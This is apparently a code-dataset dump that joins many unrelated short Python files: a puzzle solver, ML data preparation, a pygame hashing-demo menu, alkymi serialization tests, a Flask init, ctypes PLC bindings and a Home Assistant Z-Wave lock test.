if __name__ == "__main__":
    main()
|
nilq/baby-python
|
python
|
import hashlib
from collections import namedtuple
from collections import deque
passcode = 'edjrjqaa'  # puzzle input
target = (3, 3)  # bottom-right room of the 4x4 grid
# A search state: the path of moves taken so far and the current (x, y) room.
State = namedtuple('state', ['path', 'location'])
maze = {}  # NOTE(review): unused below
visited = []  # NOTE(review): unused below
# Direction -> (dx, dy); origin is the top-left room, y grows downward.
moves = {
    'U': (0, -1),
    'D': (0, 1),
    'L': (-1, 0),
    'R': (1, 0)
}
def is_valid(state):
    """Whether the state's location lies inside the 4x4 grid."""
    return all(0 <= coordinate <= 3 for coordinate in state.location)
def done(state):
    # True once the state has reached the target (bottom-right) room.
    return state.location == target
def get_open_doors(path):
    """Return the directions whose doors are open for the given path.

    A door is open when the corresponding hex digit of md5(passcode + path)
    is in 'b'..'f'. (Python 2: hashlib.md5 accepts str directly.)
    """
    digest = hashlib.md5(passcode + path).hexdigest()
    # First four hex digits map to U, D, L, R in order; for ASCII hex
    # digits the string comparison digit >= 'b' equals the ord() test.
    return [door for door, digit in zip('UDLR', digest[:4]) if digit >= 'b']
def next_states(state):
    """Expand `state`: one new state per open door, kept only if in-grid."""
    successors = []
    for direction in get_open_doors(state.path):
        dx, dy = moves[direction]
        candidate = State(path=state.path + direction,
                          location=(state.location[0] + dx, state.location[1] + dy))
        if is_valid(candidate):
            successors.append(candidate)
    return successors
# Breadth-first search over (path, location) states (Python 2 script code).
# BFS guarantees the first path that reaches the vault is the shortest
# (part 1); completed paths are not expanded further, so `longest` ends up
# as the length of the longest path reaching the vault (part 2).
has_part_1 = False
has_part_2 = False  # NOTE(review): never set anywhere below
initial_state = State(path='', location=(0, 0))
q = deque([initial_state])
longest = 0
while q:
    s = q.popleft()
    if not has_part_1 and done(s):
        print "Part 1:", s.path
        has_part_1 = True
    if done(s):
        print s
        longest = max(longest, len(s.path))
        continue
    for next_s in next_states(s):
        q.append(next_s)
else:
    # The while loop contains no `break`, so this `else` always runs once
    # the queue drains.
    print "Part 2:", longest
|
nilq/baby-python
|
python
|
"""
"""
from collections import Counter
import random
import pandas as pd
import numpy as np
import tensorflow as tf
import time
def simple_train_test_split(df, p=0.90):
    """Randomly split `df` into (train, test) frames.

    A fraction `p` of the rows (rounded down) goes to train, the rest to
    test. The test frame keeps only the 'sent' and 'emoji' columns.
    """
    total = df.shape[0]
    n_train = int(total * p)
    # One 0/1 flag per row: 0 -> train, 1 -> test, shuffled into place.
    flags = [0] * n_train + [1] * (total - n_train)
    random.shuffle(flags)
    flags = np.array(flags)
    test_split = df[["sent", "emoji"]].loc[flags == 1].copy()
    train_split = df.iloc[flags == 0].copy()
    return train_split, test_split
def _bytes_feature(value):
    """
    Returns a bytes_list from a string / byte.
    Example:
    >>> _bytes_feature("test".encode("utf-8"))
    ...
    >>> _bytes_feature("test")
    ...
    """
    if isinstance(value, type(tf.constant(0))):
        # BytesList won't unpack a string from an EagerTensor.
        value = value.numpy()
    if not isinstance(value, (bytes, bytearray)):
        # Plain str: encode to UTF-8 bytes before wrapping.
        value = value.encode("utf-8")
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value):
    """
    Returns an int64_list from a bool / enum / int / uint.
    Examples:
    >>> _int64_feature(1)
    ...
    """
    # Wrap scalars so Int64List always receives a list.
    if not isinstance(value, list):
        value = [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def write_tf_record(df, path):
    """Serialize rows of `df` ('sent' text, 'emoji' label) to a TFRecord file.

    Bug fix: the original ignored `path` and always wrote to the hard-coded
    'data/twitter_emoji_sent.tfrecords', so train and test overwrote each
    other.
    """
    with tf.io.TFRecordWriter(path) as writer:
        for row in df.itertuples():
            features = {'sent': _bytes_feature(row.sent),
                        'labels': _int64_feature(row.emoji)}
            tf_example = tf.train.Example(
                features=tf.train.Features(feature=features))
            writer.write(tf_example.SerializeToString())
class EmojiUpsample():
    """Upsamples under-represented emoji classes in a long-format frame.

    Keeps per-emoji id lists and running counts; `sample_new` draws a row
    for a rare emoji with probability inversely proportional to its current
    count, until every class approaches the count of the most common one.
    """
    def __init__(self, df, n_emoji=150):
        # df: frame with an 'id' column and an 'emoji' column whose values
        # support `i in x` membership tests.
        # NOTE(review): main() passes the output of to_long(), where 'emoji'
        # is a scalar tag, not a container — `i in x` would then fail; confirm.
        self.n_emoji = n_emoji
        self.df = df
        self.df = self.df.set_index("id", drop=False)
        self.make_count()
        # remove most common value from sampling
        i, n = self.count.most_common(1)[0]
        self.count.pop(i)
        # for testing - should pop anything in actual run
        for i in list(self.count):
            if self.count[i] == 0:
                self.count.pop(i)
        # Target count: every class is upsampled toward the most common one.
        self.max_val = n
    def make_count(self):
        # Build, per emoji id 1..n_emoji, the list of row ids containing it
        # plus start/end counters used while upsampling.
        self.sample_dict = {}
        self.count = Counter()
        for i in range(1, self.n_emoji + 1):
            ids = self.df.id[self.df.emoji.apply(lambda x: i in x)].tolist()
            n = len(ids)
            _ = {"ids": ids, "start_count": n, "end_count": n}
            self.sample_dict[i] = _
            self.count[i] = n
    def sample_new(self):
        # remove if have more than max
        for k in list(self.count):
            if self.sample_dict[k]['end_count'] >= self.max_val:
                self.count.pop(k)
        # Inverse-frequency weights: rarer emoji are sampled more often.
        _ = [(i, (self.count[i]/sum(self.count.values()))**-1)
             for i in self.count.keys()]
        population, weights = zip(*_)
        # sample emoji
        i = random.choices(population, weights=weights, k=1)[0]
        self.sample_dict[i]['end_count'] += 1
        id_population = self.sample_dict[i]['ids']
        id_ = random.choice(id_population)
        return self.df.loc[id_]
    def upsample(self, k, verbose=True):
        # Draw k new samples, printing class-balance ratios before and after.
        # NOTE(review): the verbose block indexes self.sample_dict[20]
        # directly, so it assumes n_emoji >= 20 — confirm.
        if verbose:
            last = max(self.sample_dict.keys())
            second = min(self.sample_dict.keys()) + 1
            n_last = self.sample_dict[last]["end_count"]
            n_20 = self.sample_dict[20]["end_count"]
            n_second = self.sample_dict[second]["end_count"]
            print(f"# 2nd / # 1st: {round(n_second/self.max_val, 3)}\n",
                  f"# 20th / # 1st: {round(n_20/self.max_val, 3)}\n",
                  f"# last / # 1st: {round(n_last/self.max_val, 3)}\n")
        st = time.time()
        l = []
        for i in range(k):
            s = self.sample_new()
            # self.df = self.df.append(s)
            l.append(st-time.time())
            st = time.time()
        print("rolling mean time:", np.mean(np.array(l)))
        if verbose:
            last = max(self.sample_dict.keys())
            second = min(self.sample_dict.keys()) + 1
            n_last = self.sample_dict[last]["end_count"]
            n_20 = self.sample_dict[20]["end_count"]
            n_second = self.sample_dict[second]["end_count"]
            print(f"# 2nd / # 1st: {round(n_second/self.max_val, 3)}\n",
                  f"# 20th / # 1st: {round(n_20/self.max_val, 3)}\n",
                  f"# last / # 1st: {round(n_last/self.max_val, 3)}\n")
def to_long(df):
    """Explode rows so each (sentence, emoji-tag) pair gets its own row."""
    pairs = [(row.sent, tag) for row in df.itertuples() for tag in row.emoji]
    return pd.DataFrame(pairs, columns=["sent", "emoji"])
def main():
    """Build upsampled train/test TFRecord files from the clustered data."""
    df = pd.read_json("data/emoji_sent_clustered.json")
    df = df.head(1000)
    df = to_long(df)
    # Bug fix: the original had a stray `df.ranom` attribute access here
    # (a typo), which raised AttributeError at runtime.
    train, test = simple_train_test_split(df)
    eu = EmojiUpsample(train)
    eu.upsample(k=100)
    write_tf_record(train, "data/tfrecords/train.tfrecords")
    write_tf_record(test, "data/tfrecords/test.tfrecords")
if __name__ == "__main__":
    main()
|
nilq/baby-python
|
python
|
"""Constants"""
import os
PATH = os.environ.get('HA_CONFIG_PATH', '/config')
VERSION = '1.2.0'
REDIS_TOPIC_BASE = 'custom_component_store_'
DEMO = os.environ.get('DEMO')
DEMOTEXT = "This is a demo"
DOMAINS = ['sensor', 'switch', 'media_player', 'climate', 'light',
'binary_sensor']
EXAMPLE = {
"sensor.example": {
"trackable": True,
"embedded_path": "/custom_components/example/sensor.py",
"version": VERSION,
"installed": False,
"imagelink": "https://images.pexels.com/photos/577585/pexels-photo-577585.jpeg?auto=compress&cs=tinysrgb&dpr=2&h=650&w=940", # pylint: disable=C0301
"visit_repo": "https://github.com/ludeeus/custom-component-store",
"embedded_path_remote": "https://github.com/ludeeus/custom-component-store",
"changelog": "https://github.com/ludeeus/custom-component-store",
"embedded": True,
"has_update": False,
"local_location": "/custom_components/sensor/example.py",
"local_version": VERSION,
"author": {
"login": "ludeeus",
"html_url": "https://github.com/ludeeus"
},
"description": "Example sensor entity.",
"remote_location": "https://github.com/ludeeus/custom-component-store"
}
}
|
nilq/baby-python
|
python
|
# encoding: utf-8
from typing import Any
from jinja2.ext import babel_extract
from ckan.lib.jinja_extensions import _get_extensions
def extract_ckan(fileobj: Any, *args: Any, **kw: Any) -> Any:
    """Wrap jinja2's babel_extract, injecting CKAN's default options.

    Fills in 'trimmed', 'silent' and 'extensions' (without overriding
    caller-supplied values) before delegating to babel_extract.
    """
    extension_names = []
    for ext in _get_extensions():
        if isinstance(ext, type):
            extension_names.append('%s:%s' % (ext.__module__, ext.__name__))
        else:
            extension_names.append(ext)
    options = kw.setdefault('options', {})
    options.setdefault('trimmed', 'True')
    options.setdefault('silent', 'False')
    options.setdefault('extensions', ','.join(extension_names))
    return babel_extract(fileobj, *args, **kw)
|
nilq/baby-python
|
python
|
import pygame
import pygame_menu
import src # our source module with the algorithms
import sys # another python library, here enables us to
import hlp # module with the helper functions
# Flag that ends the intro loop and activates the algorithm list menu.
intro2 = False
# introduction menu
#clk = pygame.time.Clock()
pygame.init()
# Message to hash, set through the intro menu's "Insert Message" button.
secret = ""
def StartIntro2():
    """Flip the module-level flag so the intro loop exits into menu 2."""
    global intro2 # access the global variable
    intro2 = True # turn it true, these are all helper functions
def Introduction():
    '''
    Intro menu: welcome screen with "Insert Message" / "Continue" / "Exit"
    buttons; loops until `intro2` is flipped, then opens the algorithm menu.
    '''
    global intro2, secret # accessing global variable
    pygame.display.set_caption("Hashing Algorithms Visualization Tool")
    while intro2 == False: # initial loop and setting the exit
        src.display.fill((0,0,0)) # setting the display colour
        src.display.blit(src.bg,(0,0)) ## this is a pygame method allowing us to paste objects into the screen. it takes pixel location and the object as arguments.
        # pygame method, iterates over the events in pygame to determine what we are doing with every event
        for event in pygame.event.get():
            if event.type == pygame.QUIT: # this one quits
                pygame.quit() # putting the quit pygame method
                exit() # takes the user from GUI to the script for exiting
            if event.type == pygame.KEYUP: # recognise when a keyboard key is released
                if event.key == pygame.K_ESCAPE: # if that keyboard key is ESC
                    exit() # call for the exit function.
            if event.type == pygame.MOUSEBUTTONDOWN: # mouse click handling
                if event.button == 1: # left mouse button
                    pos = pygame.mouse.get_pos() # current mouse position
                    # NOTE(review): `xwidth` is assigned further down the loop
                    # body, so a click during the very first iteration would
                    # hit an unbound name — verify.
                    if xwidth < pos[0] < xwidth+120 and 350 < pos[1] < 350+30:
                        srctTxt = hlp.InsertSecret("Text for Encription:") # prompt for the message to hash
                        if srctTxt != "": # if the string is not empty
                            try:
                                # store the entered message and advance to menu 2
                                secret = srctTxt
                                StartIntro2()
                            except: # if that is not happening
                                secret = "N/A"
        font = pygame.font.Font(src.bitterfont, 21) # creating font with size
        # creating font pygame text object with size, colour and text
        renderedText = font.render("Welcome to the Hashing Algorithms Comparison Tool", True, (255,255,255))
        # displaying text on the screen, pos is the position of where it should appear
        surface = pygame.display.get_surface()
        xwidth = (surface.get_width()/2) - 60
        twidth = surface.get_width() /2 - renderedText.get_width()/2
        src.display.blit(renderedText, (twidth,140))
        hlp.Button("Insert Message", xwidth, 350, 120, 30, None)
        hlp.Button("Continue", xwidth, 400, 120, 30, StartIntro2) # continue button
        hlp.Button("Exit", xwidth, 450, 120,
                   30, sys.exit)
        # updates the screen every turn
        pygame.display.flip()
        # cap the frame rate
        src.clock.tick(60)
    Introduction2() # proceed to the algorithm list menu
# algorithm list menu
def Introduction2():
    '''
    Algorithm list menu: loops until the user picks MD5 / SHA1 / SHA256,
    then dispatches to the matching visualization in `src`.
    '''
    display = pygame.display.set_mode((1280, 550),pygame.FULLSCREEN | pygame.DOUBLEBUF) # seting the display
    # pygame method for captioning
    pygame.display.set_caption("Hashing Comparison Tool")
    #src.ChangeColour() # calling change colour function
    while True: # stating the loop
        display.fill((0,0,0)) # setting the display colour
        src.display.blit(src.bg,(0,0)) # this is a pygame method allowing us to paste objects into the screen. it takes pixel location and the object as arguments.
        # pygame method, iterates over the events in pygame to determine what we are doing with every event
        for event in pygame.event.get():
            if event.type == pygame.QUIT: # this one quits
                pygame.quit() # putting the quit pygame method
                exit() # takes the user from GUI to the script for exiting
            if event.type == pygame.KEYUP: # recognise when a keyboard key is released
                if event.key == pygame.K_ESCAPE: # if that keyboard key is ESC
                    exit() # call for the exit function.
        surface = pygame.display.get_surface()
        xwidth = (surface.get_width()/2) - 125
        pygame.draw.rect(display, hlp.button_colour, (xwidth-7, 85, 264, 395), 3)
        # Each ButtonWithReturn yields its id (1/2/3) when clicked, else 0.
        v1 = hlp.ButtonWithReturn("MD5 Algorithm", xwidth, 90, 250,
                                  30, 1) # positioning function buttons
        v2 = hlp.ButtonWithReturn("SHA1 Algorithm", xwidth, 190,
                                  250, 30, 2) # positioning function buttons
        v3 = hlp.ButtonWithReturn("SHA256 Algorithm", xwidth, 290, 250,
                                  30, 3) # positioning function buttons
        #v4 = hlp.ButtonWithReturn("Efficiency Comparison",xwidth, 390, 250,
        #30, 4) # positioning function buttons
        hlp.Button("Exit to Desktop", xwidth, 390, 250,
                   30, sys.exit) # adding an exit button
        if v1 > 0 or v2 > 0 or v3 > 0: # if any is chosen, break the loop and go to the choice
            break
        pygame.display.flip() # updates the screen every turn
        src.clock.tick(60) # cap the frame rate
    if v1 > 0: # dispatch to the chosen visualization
        src.dspMd5() # calling for choice functions to go for
    elif v2 > 0: # calling for choice functions to go for
        src.dspSHA1() # calling for choice functions to go for
    elif v3 > 0: # calling for choice functions to go for
        src.dspSHA256() # calling for choice functions to go for
|
nilq/baby-python
|
python
|
import pandas as pd
from kiwis_pie import KIWIS
k = KIWIS('http://www.bom.gov.au/waterdata/services')
def get_cc_hrs_station_list(update = False):
    """
    Return list of station IDs that exist in HRS and are supplied by providers that license their data under the Creative Commons license.

    :param update: Flag to indicate if cached station information should be fetched from WISKI again (and saved to disk as CSV).
    :type update: boolean
    """
    if update:
        stations = k.get_timeseries_list(parametertype_name = 'Water Course Discharge', ts_name = 'DMQaQc.Merged.DailyMean.09HR')
        stations.to_csv('available_watercoursedischarge_stations.csv')
    else:
        stations = pd.read_csv('available_watercoursedischarge_stations.csv', index_col=0)
    hrs_stations = pd.read_csv('hrs_station_list.csv', skiprows=1)
    # Fix: DataFrame.ix was deprecated and removed in pandas >= 1.0;
    # boolean-mask row selection is .loc.
    station_subset = stations.loc[stations.station_no.isin(hrs_stations.station_id)]
    if update:
        station_attrs = []
        for i, station in station_subset.iterrows():
            attrs = k.get_station_list(station_no = station.station_no, parametertype_name = 'Water Course Discharge', return_fields=['station_id','station_no','custom_attributes'])
            station_attrs.append(attrs.set_index('station_id'))
        station_attributes = pd.concat(station_attrs).drop_duplicates()
        station_attributes.to_csv('station_attributes.csv')
    else:
        station_attributes = pd.read_csv('station_attributes.csv', index_col=0)
    cc_providers = pd.read_csv('cc_providers.csv', skiprows=8)
    # Keep stations whose data owner appears in the CC provider list.
    station_list = station_attributes.loc[station_attributes.DATA_OWNER.isin(cc_providers.ProviderID.values)].station_no
    return station_list.drop_duplicates()
if __name__ == "__main__":
for station in get_cc_hrs_station_list():
print(station)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import copy
import json
from pathlib import Path
from typing import List
import pytest
import alkymi as alk
from alkymi import serialization, AlkymiConfig, checksums
from alkymi.serialization import OutputWithValue
def test_serialize_item(tmpdir):
    """serialize_item handles Paths, strings, dicts and plain scalars."""
    tmpdir = Path(str(tmpdir))
    cache_path_generator = (tmpdir / str(i) for i in range(5))
    # Paths serialize to a token-prefixed string.
    result = serialization.serialize_item(Path("/test_path/test.txt"), cache_path_generator)
    assert result.startswith(serialization.PATH_TOKEN)
    # Plain strings pass through unchanged.
    test_string = "test_string"
    result = serialization.serialize_item(test_string, cache_path_generator)
    assert result == test_string
    # Test serialization of dicts
    result = serialization.serialize_item(dict(key="value"), cache_path_generator)
    assert isinstance(result, dict)
    assert result["keys"] == ["key"]
    assert result["values"] == ["value"]
    # test serialization of standard types
    items = [0, "1", 2.5, True, None]
    result = serialization.serialize_item(items, cache_path_generator)
    print(items)
    assert result == items
def test_serialize_deserialize_items(tmpdir):
    """A mixed tuple round-trips through serialize -> JSON -> deserialize."""
    tmpdir = Path(str(tmpdir))
    json_str = "{'test': 13 []''{}!!"
    items = (Path("test"), "test2", 42, 1337.0, [1, 2, 3], {"key": "value", "key2": 5}, json_str)
    cache_path_generator = (tmpdir / str(i) for i in range(5))
    serialized_items = serialization.serialize_item(items, cache_path_generator)
    assert serialized_items is not None
    assert len(serialized_items) == len(items)
    # Paths become token strings; scalars/containers keep their types.
    assert isinstance(serialized_items[0], str)
    assert isinstance(serialized_items[1], str)
    assert isinstance(serialized_items[2], int)
    assert isinstance(serialized_items[3], float)
    assert isinstance(serialized_items[4], list)
    assert len(serialized_items[4]) == len(items[4])
    assert isinstance(serialized_items[5], dict)
    assert isinstance(serialized_items[6], str)
    # Pass through JSON serialization to ensure we can save/load correctly
    serialized_items = json.loads(json.dumps(serialized_items, indent=4))
    deserialized_items = serialization.deserialize_item(serialized_items)
    assert deserialized_items is not None
    assert len(deserialized_items) == len(items)
    for deserialized_item, item in zip(deserialized_items, items):
        assert deserialized_item == item
def test_recipe_serialization(tmpdir):
    """Recipe state survives to_dict()/restore_from_dict() after a brew."""
    AlkymiConfig.get().cache = True
    tmpdir = Path(str(tmpdir))
    AlkymiConfig.get().cache_path = tmpdir  # Use temporary directory for caching
    @alk.recipe()
    def produces_build_dir() -> Path:
        build_dir = Path(tmpdir) / "build"
        build_dir.mkdir(parents=False, exist_ok=True)
        return build_dir
    @alk.recipe(ingredients=[produces_build_dir])
    def files_in_dir(build_dir: Path) -> List[Path]:
        new_file_1 = build_dir / "test.txt"
        new_file_1.touch()
        new_file_2 = build_dir / "test2.txt"
        new_file_2.touch()
        return [new_file_1, new_file_2]
    @alk.foreach(files_in_dir)
    def read_file(f: Path) -> str:
        with f.open('r') as fh:
            return fh.read()
    # Copy before brewing, so the copies hold the pristine (un-brewed) state.
    produces_build_dir_copy = copy.deepcopy(produces_build_dir)
    files_in_dir_copy = copy.deepcopy(files_in_dir)
    read_file_copy = copy.deepcopy(read_file)
    read_file.brew()
    # Ensure copied state is correct after brew
    for recipe in [produces_build_dir_copy, files_in_dir_copy, read_file_copy]:
        assert recipe.input_checksums is None
        assert recipe.outputs is None
        assert recipe.output_checksums is None
    assert read_file_copy.mapped_inputs is None
    assert read_file_copy.mapped_inputs_checksums is None
    assert read_file_copy.mapped_inputs_checksum is None
    # Test serializing -> deserializing: restoring a brewed recipe's dict into
    # the pristine copy must reproduce its checksums and outputs exactly.
    produces_build_dir_copy.restore_from_dict(produces_build_dir.to_dict())
    assert produces_build_dir_copy.input_checksums == produces_build_dir.input_checksums
    assert produces_build_dir_copy.outputs == produces_build_dir.outputs
    assert produces_build_dir_copy.output_checksums == produces_build_dir.output_checksums
    files_in_dir_copy.restore_from_dict(files_in_dir.to_dict())
    assert files_in_dir_copy.input_checksums == files_in_dir.input_checksums
    assert files_in_dir_copy.outputs == files_in_dir.outputs
    assert files_in_dir_copy.output_checksums == files_in_dir.output_checksums
    read_file_copy.restore_from_dict(read_file.to_dict())
    assert read_file_copy.input_checksums == read_file.input_checksums
    assert read_file_copy.outputs == read_file.outputs
    assert read_file_copy.output_checksums == read_file.output_checksums
    assert read_file_copy.mapped_inputs_checksums == read_file.mapped_inputs_checksums
def test_complex_serialization(tmpdir):
    """
    Test serializing a complex nested structure and checking it for validity (without deserializing) by inspecting Path
    objects in the value hierarchy
    """
    AlkymiConfig.get().cache = True
    tmpdir = Path(str(tmpdir))
    AlkymiConfig.get().cache_path = tmpdir  # Use temporary directory for caching

    subdir = tmpdir / "subdir"
    subdir.mkdir()
    file_a = tmpdir / "file_a.txt"
    with file_a.open("w") as f:
        f.write(f.name)
    # BUG FIX: this previously also said "file_a.txt", so file_b aliased
    # file_a and the test never actually exercised a second external file.
    file_b = tmpdir / "file_b.txt"
    with file_b.open("w") as f:
        f.write(f.name)

    # Cache object - everything should be valid at this point
    value = (1, 2, 3, ["a", "b", "c"], [file_a, file_b])
    obj = OutputWithValue(value, checksums.checksum(value))
    obj_cached = serialization.cache(obj, subdir)
    assert obj_cached.valid

    # Touching an external file shouldn't cause invalidation
    file_a.touch()
    assert obj_cached.valid

    # Changing one of the "external" files _should_ cause invalidation
    with file_a.open("a") as f:
        f.write("Changed!")
    assert not obj_cached.valid

    # Changing it back to the original value should cause things to work again
    with file_a.open("w") as f:
        f.write(f.name)
    assert obj_cached.valid
class MyClass:
    """Minimal user-defined type used to exercise pickle-based serialization."""
    def __init__(self, value):
        # Arbitrary payload; round-tripped through pickling in the tests below
        self.value = value
def test_enable_disable_pickling(tmpdir):
    """
    Test turning pickling on/off for serialization and checksumming
    """
    tmpdir = Path(str(tmpdir))
    value = MyClass(5)

    # Test pickling enabled
    AlkymiConfig.get().allow_pickling = True
    cache_path_generator = (tmpdir / str(i) for i in range(5))
    result = serialization.serialize_item(value, cache_path_generator)
    # Non-builtin types fall back to pickle and get a token-prefixed string
    assert result.startswith(serialization.PICKLE_TOKEN)
    assert serialization.deserialize_item(result).value == 5
    assert checksums.checksum(result) is not None

    # Test pickling disabled: serialize, deserialize and checksum must all
    # refuse to pickle a non-builtin type
    AlkymiConfig.get().allow_pickling = False
    with pytest.raises(RuntimeError):
        serialization.serialize_item(value, cache_path_generator)
    with pytest.raises(RuntimeError):
        serialization.deserialize_item(result)
    with pytest.raises(RuntimeError):
        checksums.checksum(value)

    # Return to default state (config is global -- avoid leaking into other tests)
    AlkymiConfig.get().allow_pickling = True
|
nilq/baby-python
|
python
|
# services/web/server/__init__.py
import os

from flask import Flask

# Flask application serving templates/static assets from the sibling
# ``client`` directory instead of the package defaults.
app = Flask(
    __name__,
    template_folder='../client/templates',
    static_folder='../client/static'
)

# Config class is chosen via the APP_SETTINGS environment variable;
# falls back to the development configuration.
app_settings = os.getenv(
    'APP_SETTINGS',
    'server.config.DevelopmentConfig'
)
app.config.from_object(app_settings)

# NOTE(review): imported after ``app`` is created -- presumably because the
# views module imports from this package (circular import); confirm before
# moving this import to the top.
from server.main.views import main_blueprint
app.register_blueprint(main_blueprint)
|
nilq/baby-python
|
python
|
"""
Given a non-empty array of non-negative integers nums, the degree of this array is defined as the maximum
frequency of any one of its elements. Your task is to find the smallest possible length of a (contiguous)
subarray of nums, that has the same degree as nums.
Example 1:
Input: [1, 2, 2, 3, 1]
Output: 2
Explanation: The input array has a degree of 2 because both elements 1 and 2 appear twice. Of
the subarrays that have the same degree: [1, 2, 2, 3, 1], [1, 2, 2, 3], [2, 2, 3, 1],
[1, 2, 2], [2, 2, 3], [2, 2]. The shortest length is 2. So return 2.
Example 2:
Input: [1, 2, 2, 3, 1, 4, 2]
Output: 6
Note:
nums.length will be between 1 and 50,000.
nums[i] will be an integer between 0 and 49,999.
"""
class Solution:
    def findShortestSubArray(self, nums):  # 224ms
        """Return the smallest length of a contiguous subarray of ``nums``
        whose degree (max element frequency) equals the degree of ``nums``.

        For each value we collect all of its indices; the shortest qualifying
        subarray for a value spans its first to last occurrence. Picking the
        value is done by minimizing (-frequency, span), so the highest
        frequency wins and ties break on the smaller span.
        """
        positions = {}
        for idx, value in enumerate(nums):
            positions.setdefault(value, []).append(idx)
        best = min(
            (-len(idxs), idxs[-1] - idxs[0] + 1) if len(idxs) > 1 else (-1, 1)
            for idxs in positions.values()
        )
        return best[1]
|
nilq/baby-python
|
python
|
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import libs.model_common
'''
预测目标可以是(M,B,N,N), 也可以是(M,B,N,N,1)
'''
# X=(M,B,N,PN) ,y=(M,B,N,N)
def placeholder_vector(N, F_in, F_out):
    """Create input placeholders for per-node vector targets.

    samples: (batch, N, F_in) float32; labels: (batch, N, F_out) float32.
    NOTE(review): returns (labels, samples) -- the reverse of
    placeholder_scalar's (samples, labels). Looks like a possible bug;
    confirm what callers unpack before changing.
    The tensor name "lables" is a long-standing typo but is part of the
    graph's public names -- do not fix without migrating checkpoints/callers.
    """
    samples = tf.compat.v1.placeholder(shape=(None, N, F_in), dtype=tf.float32, name="samples")
    labels = tf.compat.v1.placeholder(shape=(None, N, F_out), dtype=tf.float32, name="lables")
    return labels, samples
# X=(M,B,N,N,P) ,y=(M,B,N,N,1)
def placeholder_scalar(N, F_in, F_out):
    """Create input placeholders for pairwise (N x N) scalar targets.

    samples: (batch, N, N, F_in) float32; labels: (batch, N, N, F_out) float32.
    Returns (samples, labels). Tensor name "lables" is a typo kept for
    compatibility with existing graphs/checkpoints.
    """
    samples = tf.compat.v1.placeholder(shape=(None, N, N, F_in), dtype=tf.float32, name="samples")
    labels = tf.compat.v1.placeholder(shape=(None, N, N, F_out), dtype=tf.float32, name="lables")
    return samples, labels
def placeholder_training():
    """Return a scalar boolean placeholder toggling training-mode behaviour."""
    return tf.compat.v1.placeholder(dtype=tf.bool, shape=(), name="is_training")
def Model(args, mean, std, X, F_out, drop_rate=None, bn=False, dims=None, is_training=True):
    """Stacked fully-connected layers followed by a multi-target output head.

    Layer widths/activations come from ``args.units``/``args.activations``.
    ``mean``/``std`` are forwarded to multi_targets together with ``F_out``.
    NOTE(review): the exact semantics of multi_fc/multi_targets live in
    libs.model_common -- presumably std/mean denormalize the outputs; confirm
    there before relying on it.
    """
    X = libs.model_common.multi_fc(X, activations=args.activations, units=args.units, drop_rate=drop_rate, bn=bn, dims=dims, is_training=is_training)
    outputs = libs.model_common.multi_targets(X, std, mean, F_out)
    return outputs
|
nilq/baby-python
|
python
|
import ctypes
from enum import Enum
class _DaveOSSerialType(ctypes.Structure):
    # ctypes mirror of the C library's OS serial handle: separate read/write
    # file descriptors for the serial link (presumably libnodave's
    # _daveOSserialType -- confirm against the library headers).
    _fields_ = [("rfd", ctypes.c_int), ("wfd", ctypes.c_int)]
class _DaveInterface(ctypes.Structure):
    # Opaque C struct: no fields declared, used only behind pointers.
    pass
class _DaveConnection(ctypes.Structure):
    # Opaque C struct: no fields declared, used only behind pointers.
    pass
class DaveArea(Enum):
    """Memory-area codes used when addressing data on S7/S5 PLCs."""
    daveSysInfo = 0x3  # System info of 200 family
    daveSysFlags = 0x5  # System flags of 200 family
    daveAnaIn = 0x6  # analog inputs of 200 family
    daveAnaOut = 0x7  # analog outputs of 200 family
    daveP = 0x80  # direct peripheral access
    daveInputs = 0x81  # inputs
    daveOutputs = 0x82  # outputs
    daveFlags = 0x83  # flags \ markers
    daveDB = 0x84  # data blocks
    daveDI = 0x85  # instance data blocks
    daveLocal = 0x86  # not tested
    daveV = 0x87  # don't know what it is
    daveCounter = 28  # S7 counters
    daveTimer = 29  # S7 timers
    daveCounter200 = 30  # IEC counters (200 family)
    daveTimer200 = 31  # IEC timers (200 family)
    # NOTE(review): 0x86 duplicates daveLocal above, so Enum treats
    # daveSysDataS5 as an *alias* of daveLocal (it will not appear as a
    # distinct member when iterating) -- confirm this is intended.
    daveSysDataS5 = 0x86  # system data area ?
    daveRawMemoryS5 = 0  # just the raw memory
|
nilq/baby-python
|
python
|
"""Test the Z-Wave JS lock platform."""
from zwave_js_server.event import Event
from homeassistant.components.lock import (
DOMAIN as LOCK_DOMAIN,
SERVICE_LOCK,
SERVICE_UNLOCK,
)
from homeassistant.const import ATTR_ENTITY_ID, STATE_LOCKED, STATE_UNLOCKED
# Entity id created for the lock_schlage_be469 fixture's node.
SCHLAGE_BE469_LOCK_ENTITY = "lock.touchscreen_deadbolt_current_lock_mode"
async def test_door_lock(hass, client, lock_schlage_be469, integration):
    """Test a lock entity with door lock command class.

    Verifies the exact node.set_value payload sent for lock/unlock (per the
    states map in the payload: 255 = Secured, 0 = Unsecured) and that a
    "value updated" event from the node updates the entity state.
    """
    node = lock_schlage_be469
    state = hass.states.get(SCHLAGE_BE469_LOCK_ENTITY)
    assert state
    assert state.state == STATE_UNLOCKED

    # Test locking
    await hass.services.async_call(
        LOCK_DOMAIN,
        SERVICE_LOCK,
        {ATTR_ENTITY_ID: SCHLAGE_BE469_LOCK_ENTITY},
        blocking=True,
    )
    # Exactly one command must have gone out, writing targetMode = 255
    assert len(client.async_send_command.call_args_list) == 1
    args = client.async_send_command.call_args[0][0]
    assert args["command"] == "node.set_value"
    assert args["nodeId"] == 20
    assert args["valueId"] == {
        "commandClassName": "Door Lock",
        "commandClass": 98,
        "endpoint": 0,
        "property": "targetMode",
        "propertyName": "targetMode",
        "metadata": {
            "type": "number",
            "readable": True,
            "writeable": True,
            "min": 0,
            "max": 255,
            "label": "Target lock mode",
            "states": {
                "0": "Unsecured",
                "1": "UnsecuredWithTimeout",
                "16": "InsideUnsecured",
                "17": "InsideUnsecuredWithTimeout",
                "32": "OutsideUnsecured",
                "33": "OutsideUnsecuredWithTimeout",
                "254": "Unknown",
                "255": "Secured",
            },
        },
    }
    assert args["value"] == 255

    client.async_send_command.reset_mock()

    # Test locked update from value updated event
    event = Event(
        type="value updated",
        data={
            "source": "node",
            "event": "value updated",
            "nodeId": 20,
            "args": {
                "commandClassName": "Door Lock",
                "commandClass": 98,
                "endpoint": 0,
                "property": "currentMode",
                "newValue": 255,
                "prevValue": 0,
                "propertyName": "currentMode",
            },
        },
    )
    node.receive_event(event)
